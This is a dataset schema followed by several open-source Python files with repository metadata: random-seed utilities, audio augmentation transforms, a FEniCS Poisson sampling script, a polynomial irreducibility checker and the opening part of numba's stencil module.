Dataset schema (column, dtype, observed range or class count):

| column | dtype | range |
|---|---|---|
| hexsha | stringlengths | 40–40 |
| size | int64 | 5–2.06M |
| ext | stringclasses | 10 values |
| lang | stringclasses | 1 value |
| max_stars_repo_path | stringlengths | 3–248 |
| max_stars_repo_name | stringlengths | 5–125 |
| max_stars_repo_head_hexsha | stringlengths | 40–78 |
| max_stars_repo_licenses | sequencelengths | 1–10 |
| max_stars_count | int64 | 1–191k |
| max_stars_repo_stars_event_min_datetime | stringlengths | 24–24 |
| max_stars_repo_stars_event_max_datetime | stringlengths | 24–24 |
| max_issues_repo_path | stringlengths | 3–248 |
| max_issues_repo_name | stringlengths | 5–125 |
| max_issues_repo_head_hexsha | stringlengths | 40–78 |
| max_issues_repo_licenses | sequencelengths | 1–10 |
| max_issues_count | int64 | 1–67k |
| max_issues_repo_issues_event_min_datetime | stringlengths | 24–24 |
| max_issues_repo_issues_event_max_datetime | stringlengths | 24–24 |
| max_forks_repo_path | stringlengths | 3–248 |
| max_forks_repo_name | stringlengths | 5–125 |
| max_forks_repo_head_hexsha | stringlengths | 40–78 |
| max_forks_repo_licenses | sequencelengths | 1–10 |
| max_forks_count | int64 | 1–105k |
| max_forks_repo_forks_event_min_datetime | stringlengths | 24–24 |
| max_forks_repo_forks_event_max_datetime | stringlengths | 24–24 |
| content | stringlengths | 5–2.06M |
| avg_line_length | float64 | 1–1.02M |
| max_line_length | int64 | 3–1.03M |
| alphanum_fraction | float64 | 0–1 |
| count_classes | int64 | 0–1.6M |
| score_classes | float64 | 0–1 |
| count_generators | int64 | 0–651k |
| score_generators | float64 | 0–1 |
| count_decorators | int64 | 0–990k |
| score_decorators | float64 | 0–1 |
| count_async_functions | int64 | 0–235k |
| score_async_functions | float64 | 0–1 |
| count_documentation | int64 | 0–1.04M |
| score_documentation | float64 | 0–1 |
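For orientation, a minimal sketch of how a dataset with this schema could be streamed and filtered on the precomputed quality scores; the hub ID `"user/python-corpus"` is a hypothetical placeholder, not the real dataset name, and only the column names from the table above are assumed.

```python
# Minimal sketch, assuming a Hugging Face dataset with the schema above.
# "user/python-corpus" is a hypothetical placeholder hub ID.
from datasets import load_dataset

ds = load_dataset("user/python-corpus", split="train", streaming=True)

# Keep files that are reasonably well documented and not minified.
for record in ds:
    if record["score_documentation"] > 0.5 and record["avg_line_length"] < 100:
        print(record["max_stars_repo_name"], record["max_stars_repo_path"])
        print(record["content"][:200])  # first 200 characters of the source file
        break
```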
hexsha `4c2d9f91e47f374b558a37fc891829c105809bba` · size 4,714 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | rlcard/utils/seeding.py | AdrianP-/rlcard | 5b99dc8faa4c97ecac2d1189967b90c45d79624b | ["MIT"] | null | null | null |
| issues | rlcard/utils/seeding.py | AdrianP-/rlcard | 5b99dc8faa4c97ecac2d1189967b90c45d79624b | ["MIT"] | null | null | null |
| forks | rlcard/utils/seeding.py | AdrianP-/rlcard | 5b99dc8faa4c97ecac2d1189967b90c45d79624b | ["MIT"] | null | null | null |

content:
```python
#The MIT License
#
#Copyright (c) 2020 DATA Lab at Texas A&M University
#Copyright (c) 2016 OpenAI (https://openai.com)
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

import hashlib
import numpy as np
import os
import struct


def colorize(string, color, bold=False, highlight=False):
    """Return string surrounded by appropriate terminal color codes to
    print colorized text.  Valid colors: gray, red, green, yellow,
    blue, magenta, cyan, white, crimson
    """
    attr = []
    num = color2num[color]
    if highlight:
        num += 10
    attr.append(str(num))
    if bold:
        attr.append('1')
    attrs = ';'.join(attr)
    return '\x1b[%sm%s\x1b[0m' % (attrs, string)


def error(msg, *args):
    print(colorize('%s: %s' % ('ERROR', msg % args), 'red'))


def np_random(seed=None):
    if seed is not None and not (isinstance(seed, int) and 0 <= seed):
        raise error.Error('Seed must be a non-negative integer or omitted, not {}'.format(seed))

    seed = create_seed(seed)

    rng = np.random.RandomState()
    rng.seed(_int_list_from_bigint(hash_seed(seed)))
    return rng, seed


def hash_seed(seed=None, max_bytes=8):
    """Any given evaluation is likely to have many PRNG's active at
    once. (Most commonly, because the environment is running in
    multiple processes.) There's literature indicating that having
    linear correlations between seeds of multiple PRNG's can correlate
    the outputs:

    http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/
    http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be
    http://dl.acm.org/citation.cfm?id=1276928

    Thus, for sanity we hash the seeds before using them. (This scheme
    is likely not crypto-strength, but it should be good enough to get
    rid of simple correlations.)

    Args:
        seed (Optional[int]): None seeds from an operating system specific randomness source.
        max_bytes: Maximum number of bytes to use in the hashed seed.
    """
    if seed is None:
        seed = create_seed(max_bytes=max_bytes)
    hash = hashlib.sha512(str(seed).encode('utf8')).digest()
    return _bigint_from_bytes(hash[:max_bytes])


def create_seed(a=None, max_bytes=8):
    """Create a strong random seed. Otherwise, Python 2 would seed using
    the system time, which might be non-robust especially in the
    presence of concurrency.

    Args:
        a (Optional[int, str]): None seeds from an operating system specific randomness source.
        max_bytes: Maximum number of bytes to use in the seed.
    """
    # Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py
    if a is None:
        a = _bigint_from_bytes(os.urandom(max_bytes))
    elif isinstance(a, str):
        a = a.encode('utf8')
        a += hashlib.sha512(a).digest()
        a = _bigint_from_bytes(a[:max_bytes])
    elif isinstance(a, int):
        a = a % 2**(8 * max_bytes)
    else:
        raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a))

    return a


# TODO: don't hardcode sizeof_int here
def _bigint_from_bytes(bytes):
    sizeof_int = 4
    padding = sizeof_int - len(bytes) % sizeof_int
    bytes += b'\0' * padding
    int_count = int(len(bytes) / sizeof_int)
    unpacked = struct.unpack("{}I".format(int_count), bytes)
    accum = 0
    for i, val in enumerate(unpacked):
        accum += 2 ** (sizeof_int * 8 * i) * val
    return accum


def _int_list_from_bigint(bigint):
    # Special case 0
    if bigint < 0:
        raise error.Error('Seed must be non-negative, not {}'.format(bigint))
    elif bigint == 0:
        return [0]

    ints = []
    while bigint > 0:
        bigint, mod = divmod(bigint, 2 ** 32)
        ints.append(mod)
    return ints
```
stats: avg_line_length 41.350877 · max_line_length 461 · alphanum_fraction 0.694103 · count_classes 0 · score_classes 0 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 2,836 · score_documentation 0.601612
hexsha `4c2f421ab198ddb3faa7c72a6c2f2f1822a0634f` · size 8,573 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | ops/transforms.py | ex4sperans/freesound-classification | 71b9920ce0ae376aa7f1a3a2943f0f92f4820813 | ["Apache-2.0"] | 55 | 2019-06-30T02:36:10.000Z | 2021-12-07T07:24:42.000Z |
| issues | ops/transforms.py | ex4sperans/freesound-classification | 71b9920ce0ae376aa7f1a3a2943f0f92f4820813 | ["Apache-2.0"] | 13 | 2020-01-28T22:48:34.000Z | 2022-03-11T23:50:36.000Z |
| forks | ops/transforms.py | ex4sperans/freesound-classification | 71b9920ce0ae376aa7f1a3a2943f0f92f4820813 | ["Apache-2.0"] | 7 | 2019-07-21T15:54:16.000Z | 2020-07-22T13:02:37.000Z |

content:
```python
import random
import math
from functools import partial
import json

import pysndfx
import librosa
import numpy as np
import torch

from ops.audio import (
    read_audio, compute_stft, trim_audio, mix_audio_and_labels,
    shuffle_audio, cutout
)

SAMPLE_RATE = 44100


class Augmentation:
    """A base class for data augmentation transforms"""
    pass


class MapLabels:
    def __init__(self, class_map, drop_raw=True):
        self.class_map = class_map

    def __call__(self, dataset, **inputs):
        labels = np.zeros(len(self.class_map), dtype=np.float32)
        for c in inputs["raw_labels"]:
            labels[self.class_map[c]] = 1.0

        transformed = dict(inputs)
        transformed["labels"] = labels
        transformed.pop("raw_labels")

        return transformed


class MixUp(Augmentation):
    def __init__(self, p):
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            first_audio, first_labels = inputs["audio"], inputs["labels"]
            random_sample = dataset.random_clean_sample()
            new_audio, new_labels = mix_audio_and_labels(
                first_audio, random_sample["audio"],
                first_labels, random_sample["labels"]
            )

            transformed["audio"] = new_audio
            transformed["labels"] = new_labels

        return transformed


class FlipAudio(Augmentation):
    def __init__(self, p):
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            transformed["audio"] = np.flipud(inputs["audio"])

        return transformed


class AudioAugmentation(Augmentation):
    def __init__(self, p):
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            effects_chain = (
                pysndfx.AudioEffectsChain()
                .reverb(
                    reverberance=random.randrange(50),
                    room_scale=random.randrange(50),
                    stereo_depth=random.randrange(50)
                )
                .pitch(shift=random.randrange(-300, 300))
                .overdrive(gain=random.randrange(2, 10))
                .speed(random.uniform(0.9, 1.1))
            )
            transformed["audio"] = effects_chain(inputs["audio"])

        return transformed


class LoadAudio:
    def __init__(self):
        pass

    def __call__(self, dataset, **inputs):
        audio, sr = read_audio(inputs["filename"])

        transformed = dict(inputs)
        transformed["audio"] = audio
        transformed["sr"] = sr

        return transformed


class STFT:
    eps = 1e-4

    def __init__(self, n_fft, hop_size):
        self.n_fft = n_fft
        self.hop_size = hop_size

    def __call__(self, dataset, **inputs):
        stft = compute_stft(
            inputs["audio"],
            window_size=self.n_fft, hop_size=self.hop_size, eps=self.eps)

        transformed = dict(inputs)
        transformed["stft"] = np.transpose(stft)

        return transformed


class AudioFeatures:
    eps = 1e-4

    def __init__(self, descriptor, verbose=True):
        name, *args = descriptor.split("_")

        self.feature_type = name

        if name == "stft":
            n_fft, hop_size = args
            self.n_fft = int(n_fft)
            self.hop_size = int(hop_size)
            self.n_features = self.n_fft // 2 + 1
            self.padding_value = 0.0
            if verbose:
                print(
                    "\nUsing STFT features with params:\n",
                    "n_fft: {}, hop_size: {}".format(n_fft, hop_size)
                )

        elif name == "mel":
            n_fft, hop_size, n_mel = args
            self.n_fft = int(n_fft)
            self.hop_size = int(hop_size)
            self.n_mel = int(n_mel)
            self.n_features = self.n_mel
            self.padding_value = 0.0
            if verbose:
                print(
                    "\nUsing mel features with params:\n",
                    "n_fft: {}, hop_size: {}, n_mel: {}".format(
                        n_fft, hop_size, n_mel)
                )

        elif name == "raw":
            self.n_features = 1
            self.padding_value = 0.0
            if verbose:
                print("\nUsing raw waveform features.")

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if self.feature_type == "stft":
            # stft = compute_stft(
            #     inputs["audio"],
            #     window_size=self.n_fft, hop_size=self.hop_size,
            #     eps=self.eps, log=True
            # )
            transformed["signal"] = np.expand_dims(inputs["audio"], -1)

        elif self.feature_type == "mel":
            stft = compute_stft(
                inputs["audio"],
                window_size=self.n_fft, hop_size=self.hop_size,
                eps=self.eps, log=False
            )
            transformed["signal"] = np.expand_dims(inputs["audio"], -1)

        elif self.feature_type == "raw":
            transformed["signal"] = np.expand_dims(inputs["audio"], -1)

        return transformed


class SampleSegment(Augmentation):
    def __init__(self, ratio=(0.3, 0.9), p=1.0):
        self.min, self.max = ratio
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            original_size = inputs["audio"].size
            target_size = int(np.random.uniform(self.min, self.max) * original_size)
            start = np.random.randint(original_size - target_size - 1)
            transformed["audio"] = inputs["audio"][start:start+target_size]

        return transformed


class ShuffleAudio(Augmentation):
    def __init__(self, chunk_length=0.5, p=0.5):
        self.chunk_length = chunk_length
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            transformed["audio"] = shuffle_audio(
                transformed["audio"], self.chunk_length, sr=transformed["sr"])

        return transformed


class CutOut(Augmentation):
    def __init__(self, area=0.25, p=0.5):
        self.area = area
        self.p = p

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if np.random.uniform() < self.p:
            transformed["audio"] = cutout(transformed["audio"], self.area)

        return transformed


class SampleLongAudio:
    def __init__(self, max_length):
        self.max_length = max_length

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        if (inputs["audio"].size / inputs["sr"]) > self.max_length:
            max_length = self.max_length * inputs["sr"]
            start = np.random.randint(0, inputs["audio"].size - max_length)
            transformed["audio"] = inputs["audio"][start:start+max_length]

        return transformed


class OneOf:
    def __init__(self, transforms):
        self.transforms = transforms

    def __call__(self, dataset, **inputs):
        transform = random.choice(self.transforms)
        return transform(**inputs)


class DropFields:
    def __init__(self, fields):
        self.to_drop = fields

    def __call__(self, dataset, **inputs):
        transformed = dict()

        for name, input in inputs.items():
            if not name in self.to_drop:
                transformed[name] = input

        return transformed


class RenameFields:
    def __init__(self, mapping):
        self.mapping = mapping

    def __call__(self, dataset, **inputs):
        transformed = dict(inputs)

        for old, new in self.mapping.items():
            transformed[new] = transformed.pop(old)

        return transformed


class Compose:
    def __init__(self, transforms):
        self.transforms = transforms

    def switch_off_augmentations(self):
        for t in self.transforms:
            if isinstance(t, Augmentation):
                t.p = 0.0

    def __call__(self, dataset=None, **inputs):
        for t in self.transforms:
            inputs = t(dataset=dataset, **inputs)

        return inputs


class Identity:
    def __call__(self, dataset=None, **inputs):
        return inputs
```
stats: avg_line_length 22.679894 · max_line_length 84 · alphanum_fraction 0.561647 · count_classes 8,253 · score_classes 0.962674 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 662 · score_documentation 0.077219
hexsha `4c30506aa8598c0388ff7d67c1b22762e60080e5` · size 2,011 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | figures/pp.py | mathematicalmichael/thesis | 2906b10f94960c3e75bdb48e5b8b583f59b9441e | ["MIT"] | 6 | 2019-04-24T08:05:49.000Z | 2020-12-28T20:34:29.000Z |
| issues | figures/pp.py | mathematicalmichael/thesis | 2906b10f94960c3e75bdb48e5b8b583f59b9441e | ["MIT"] | 59 | 2019-12-27T23:15:05.000Z | 2021-11-24T17:52:57.000Z |
| forks | figures/pp.py | mathematicalmichael/thesis | 2906b10f94960c3e75bdb48e5b8b583f59b9441e | ["MIT"] | null | null | null |

content:
```python
#!/usr/bin/env python
import os
# os.environ['OMP_NUM_THREADS'] = '1'
from newpoisson import poisson
import numpy as np
from fenics import set_log_level, File, RectangleMesh, Point

mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36)
# comm = mesh.mpi_comm()
set_log_level(40)  # ERROR=40

# from mpi4py import MPI
# comm = MPI.COMM_WORLD
# rank = comm.Get_rank()

if __name__=='__main__':
    import argparse

    parser = argparse.ArgumentParser(description="Poisson Problem")
    parser.add_argument('-n', '--num', default=10, type=int,
                        help="Number of samples")
    parser.add_argument('-o', '--outfile', default='results',
                        help="Output filename (no extension)")
    parser.add_argument('-i', '--input-dim', default=1, type=int)
    parser.add_argument('-d', '--dist', default='u',
                        help='Distribution. `n` (normal), `u` (uniform, default)')
    args = parser.parse_args()

    num_samples = args.num
    dist = args.dist
    outfile = args.outfile.replace('.pkl','')
    inputdim = args.input_dim

    if inputdim == 1:  # U[1,5]
        randsamples = 1 + 4*np.random.rand(num_samples)
    else:  # N(0,1)
        if dist == 'n':
            randsamples = np.random.randn(num_samples, inputdim)
        elif dist == 'u':
            randsamples = -4*np.random.rand(num_samples, inputdim)
        else:
            raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)")

    sample_seed_list = list(zip(range(num_samples), randsamples))

    def wrapper(sample, outfile):
        g = sample[1]
        u = poisson(gamma=g, mesh=mesh)
        # Save solution
        fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml"
        File(fname, 'w') << u
        return {int(sample[0]): {'u': fname, 'gamma': sample[1]}}

    results = []
    for sample in sample_seed_list:
        r = wrapper(sample, outfile)
        results.append(r)
    # print(results)

    import pickle
    pickle.dump(results, open(f'{outfile}.pkl','wb'))
```
stats: avg_line_length 32.967213 · max_line_length 111 · alphanum_fraction 0.61462 · count_classes 0 · score_classes 0 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 576 · score_documentation 0.286425
hexsha `4c308137f6fcaffcc096aaa674f08780ed2a8ef7` · size 3,606 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | ["MIT"] | null | null | null |
| issues | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | ["MIT"] | null | null | null |
| forks | additions/irreducible_check.py | kluhan/seraphim | 412b693effb15f80d348d6d885d7c781774bb8aa | ["MIT"] | null | null | null |

content (docstrings and comments translated from German):
""" Irreduzibilitätskriterien Implementiert wurden das Eisenstein- und das Perronkriterium Quellen: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten """ import logging import helper import itertools def factor(n): # Faktorisierung einer Zahl n i = 0 factors = [] for i in range(1, n + 1): if n % i == 0: factors.append(i) return factors def prime_factor(n): # Primfaktorzerlegung einer Zahl n i = 2 factors = [] while i * i <= n: if n % i: i += 1 else: n //= i factors.append(i) if n > 1: factors.append(n) return factors # rekursive Implementierung von HCF def hcf(x, y): """Highest common factor""" if y == 0: return x else: return hcf(y, x % y) def is_polynomial_coprime(polynomial): """Überprüft, ob ein Polynom teilerfremd (coprime) ist""" non_zero_polynomial = [ i for i in polynomial.coefficients if i != 0 ] # Nullen würden Ergebnis von HCF verfälschen if polynomial.degree() == 0: return True for x, y in itertools.combinations(non_zero_polynomial, 2): if hcf(x, y) != 1: return False return True # Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf def is_irreducible_perron(polynomial): """ Prüft ein Polynom auf Irreduzierbarkeit (Perron). Führender Koeffizient != 1 funktioniert nicht. Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten """ if polynomial.degree() < 0: return logging.error("Polynom ungültig") const_coefficient = polynomial.coefficients[0] if const_coefficient == 0: return 0 lead_coefficient = polynomial.coefficients[polynomial.degree()] assert lead_coefficient == 1 nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1]) total = 1 i = 0 for coeff in polynomial.coefficients: if i < polynomial.degree() - 1: total += abs(coeff) i = i + 1 if nm1_coefficient > total: return 1 return 2 # Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf # http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf def is_irreducible_eisenstein(polynomial): """ Eine Implementierung des Eisensteinkriteriums. """ # Polynom muss einen Grad m >= 1 haben if polynomial.degree() < 1: return 2 # Voraussetzung für Eisenstein sind teilerfremde Koeffizienten if helper.is_polynomial_coprime(polynomial is False): return 2 # Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen const_coeff = polynomial.coefficients[0] if const_coeff == 0: return 0 # Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten prime_factors = helper.prime_factor(const_coeff) for p in prime_factors: if ( const_coeff % pow(p, 2) != 0 ): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden return 2 for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]: if coeff % p != 0: return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden return 1
stats: avg_line_length 27.112782 · max_line_length 121 · alphanum_fraction 0.646977 · count_classes 0 · score_classes 0 · count_generators 0 · score_generators 0 · count_decorators 0 · score_decorators 0 · count_async_functions 0 · score_async_functions 0 · count_documentation 1,549 · score_documentation 0.428137
hexsha `4c30bd2dd03a5aeb1d8422cd8b6cb2d539652200` · size 39,763 · ext py · lang Python

| events | path | repo | head hexsha | licenses | count | min datetime | max datetime |
|---|---|---|---|---|---|---|---|
| stars | numba/stencils/stencil.py | auderson/numba | 3d67c9850ab56457f418cf40af6245fd9c337705 | ["BSD-2-Clause"] | 6,620 | 2015-01-04T08:51:04.000Z | 2022-03-31T12:52:18.000Z |
| issues | numba/stencils/stencil.py | auderson/numba | 3d67c9850ab56457f418cf40af6245fd9c337705 | ["BSD-2-Clause"] | 6,457 | 2015-01-04T03:18:41.000Z | 2022-03-31T17:38:42.000Z |
| forks | numba/stencils/stencil.py | auderson/numba | 3d67c9850ab56457f418cf40af6245fd9c337705 | ["BSD-2-Clause"] | 930 | 2015-01-25T02:33:03.000Z | 2022-03-30T14:10:32.000Z |

content:
```python
#
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#

import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
                                         infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.core.errors import NumbaValueError
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support


class StencilFuncLowerer(object):
    '''Callable class responsible for lowering calls to a specific
    StencilFunc.
    '''
    def __init__(self, sf):
        self.stencilFunc = sf

    def __call__(self, context, builder, sig, args):
        cres = self.stencilFunc.compile_for_argtys(sig.args, {},
                                                   sig.return_type, None)
        res = context.call_internal(builder, cres.fndesc, sig, args)
        context.add_linking_libs([cres.library])
        return res


@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
    ashape = a.shape
    # We need literal_unroll here because the stencil might take
    # multiple input arrays with different types that are not compatible
    # (e.g. values as float[:] and flags as bool[:])
    # When more than three total arrays are given, the second and third
    # are iterated over in the loop below. Without literal_unroll, their
    # types have to match.
    # An example failing signature without literal_unroll might be
    # (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
    for arg in literal_unroll(args):
        if a.ndim != arg.ndim:
            raise ValueError("Secondary stencil array does not have same number "
                             " of dimensions as the first stencil input.")
        argshape = arg.shape
        for i in range(len(ashape)):
            if ashape[i] > argshape[i]:
                raise ValueError("Secondary stencil array has some dimension "
                                 "smaller the same dimension in the first "
                                 "stencil input.")


def slice_addition(the_slice, addend):
    """ Called by stencil in Python mode to add the loop index to a
        user-specified slice.
    """
    return slice(the_slice.start + addend, the_slice.stop + addend)


class StencilFunc(object):
    """
    A special type to hold stencil information for the IR.
    """

    id_counter = 0

    def __init__(self, kernel_ir, mode, options):
        self.id = type(self).id_counter
        type(self).id_counter += 1
        self.kernel_ir = kernel_ir
        self.mode = mode
        self.options = options
        self.kws = []       # remember original kws arguments

        # stencils only supported for CPU context currently
        self._typingctx = registry.cpu_target.typing_context
        self._targetctx = registry.cpu_target.target_context
        self._typingctx.refresh()
        self._targetctx.refresh()
        self._install_type(self._typingctx)
        self.neighborhood = self.options.get("neighborhood")
        self._type_cache = {}
        self._lower_me = StencilFuncLowerer(self)

    def replace_return_with_setitem(self, blocks, index_vars, out_name):
        """
        Find return statements in the IR and replace them with a SetItem
        call of the value "returned" by the kernel into the result array.
        Returns the block labels that contained return statements.
        """
        ret_blocks = []

        for label, block in blocks.items():
            scope = block.scope
            loc = block.loc
            new_body = []
            for stmt in block.body:
                if isinstance(stmt, ir.Return):
                    ret_blocks.append(label)
                    # If 1D array then avoid the tuple construction.
                    if len(index_vars) == 1:
                        rvar = ir.Var(scope, out_name, loc)
                        ivar = ir.Var(scope, index_vars[0], loc)
                        new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
                    else:
                        # Convert the string names of the index variables into
                        # ir.Var's.
                        var_index_vars = []
                        for one_var in index_vars:
                            index_var = ir.Var(scope, one_var, loc)
                            var_index_vars += [index_var]

                        s_index_name = ir_utils.mk_unique_var("stencil_index")
                        s_index_var = ir.Var(scope, s_index_name, loc)
                        # Build a tuple from the index ir.Var's.
                        tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
                        new_body.append(ir.Assign(tuple_call, s_index_var, loc))
                        rvar = ir.Var(scope, out_name, loc)
                        # Write the return statements original value into
                        # the array using the tuple index.
                        si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
                        new_body.append(si)
                else:
                    new_body.append(stmt)
            block.body = new_body
        return ret_blocks

    def add_indices_to_kernel(self, kernel, index_names, ndim,
                              neighborhood, standard_indexed,
                              typemap, calltypes):
        """
        Transforms the stencil kernel as specified by the user into one
        that includes each dimension's index variable as part of the getitem
        calls.  So, in effect array[-1] becomes array[index0-1].
        """
        const_dict = {}
        kernel_consts = []

        if config.DEBUG_ARRAY_OPT >= 1:
            print("add_indices_to_kernel", ndim, neighborhood)
            ir_utils.dump_blocks(kernel.blocks)

        if neighborhood is None:
            need_to_calc_kernel = True
        else:
            need_to_calc_kernel = False
            if len(neighborhood) != ndim:
                raise ValueError("%d dimensional neighborhood specified for %d " \
                    "dimensional input array" % (len(neighborhood), ndim))

        tuple_table = ir_utils.get_tuple_table(kernel.blocks)

        relatively_indexed = set()

        for block in kernel.blocks.values():
            scope = block.scope
            loc = block.loc
            new_body = []
            for stmt in block.body:
                if (isinstance(stmt, ir.Assign) and
                    isinstance(stmt.value, ir.Const)):
                    if config.DEBUG_ARRAY_OPT >= 1:
                        print("remembering in const_dict", stmt.target.name,
                              stmt.value.value)
                    # Remember consts for use later.
                    const_dict[stmt.target.name] = stmt.value.value
                if ((isinstance(stmt, ir.Assign)
                        and isinstance(stmt.value, ir.Expr)
                        and stmt.value.op in ['setitem', 'static_setitem']
                        and stmt.value.value.name in kernel.arg_names) or
                   (isinstance(stmt, ir.SetItem)
                        and stmt.target.name in kernel.arg_names)):
                    raise ValueError("Assignments to arrays passed to stencil " \
                        "kernels is not allowed.")
                if (isinstance(stmt, ir.Assign)
                        and isinstance(stmt.value, ir.Expr)
                        and stmt.value.op in ['getitem', 'static_getitem']
                        and stmt.value.value.name in kernel.arg_names
                        and stmt.value.value.name not in standard_indexed):
                    # We found a getitem from the input array.
                    if stmt.value.op == 'getitem':
                        stmt_index_var = stmt.value.index
                    else:
                        stmt_index_var = stmt.value.index_var
                        # allow static_getitem since rewrite passes are applied
                        #raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")

                    relatively_indexed.add(stmt.value.value.name)

                    # Store the index used after looking up the variable in
                    # the const dictionary.
                    if need_to_calc_kernel:
                        assert hasattr(stmt_index_var, 'name')

                        if stmt_index_var.name in tuple_table:
                            kernel_consts += [tuple_table[stmt_index_var.name]]
                        elif stmt_index_var.name in const_dict:
                            kernel_consts += [const_dict[stmt_index_var.name]]
                        else:
                            raise NumbaValueError("stencil kernel index is not "
                                "constant, 'neighborhood' option required")

                    if ndim == 1:
                        # Single dimension always has index variable 'index0'.
                        # tmpvar will hold the real index and is computed by
                        # adding the relative offset in stmt.value.index to
                        # the current absolute location in index0.
                        index_var = ir.Var(scope, index_names[0], loc)
                        tmpname = ir_utils.mk_unique_var("stencil_index")
                        tmpvar = ir.Var(scope, tmpname, loc)
                        stmt_index_var_typ = typemap[stmt_index_var.name]
                        # If the array is indexed with a slice then we
                        # have to add the index value with a call to
                        # slice_addition.
                        if isinstance(stmt_index_var_typ, types.misc.SliceType):
                            sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
                            sa_func = numba.njit(slice_addition)
                            sa_func_typ = types.functions.Dispatcher(sa_func)
                            typemap[sa_var.name] = sa_func_typ
                            g_sa = ir.Global("slice_addition", sa_func, loc)
                            new_body.append(ir.Assign(g_sa, sa_var, loc))
                            slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
                            calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
                            new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
                            new_body.append(ir.Assign(
                                ir.Expr.getitem(stmt.value.value, tmpvar, loc),
                                stmt.target, loc))
                        else:
                            acc_call = ir.Expr.binop(operator.add, stmt_index_var,
                                                     index_var, loc)
                            new_body.append(ir.Assign(acc_call, tmpvar, loc))
                            new_body.append(ir.Assign(
                                ir.Expr.getitem(stmt.value.value, tmpvar, loc),
                                stmt.target, loc))
                    else:
                        index_vars = []
                        sum_results = []
                        s_index_name = ir_utils.mk_unique_var("stencil_index")
                        s_index_var = ir.Var(scope, s_index_name, loc)
                        const_index_vars = []
                        ind_stencils = []

                        stmt_index_var_typ = typemap[stmt_index_var.name]
                        # Same idea as above but you have to extract
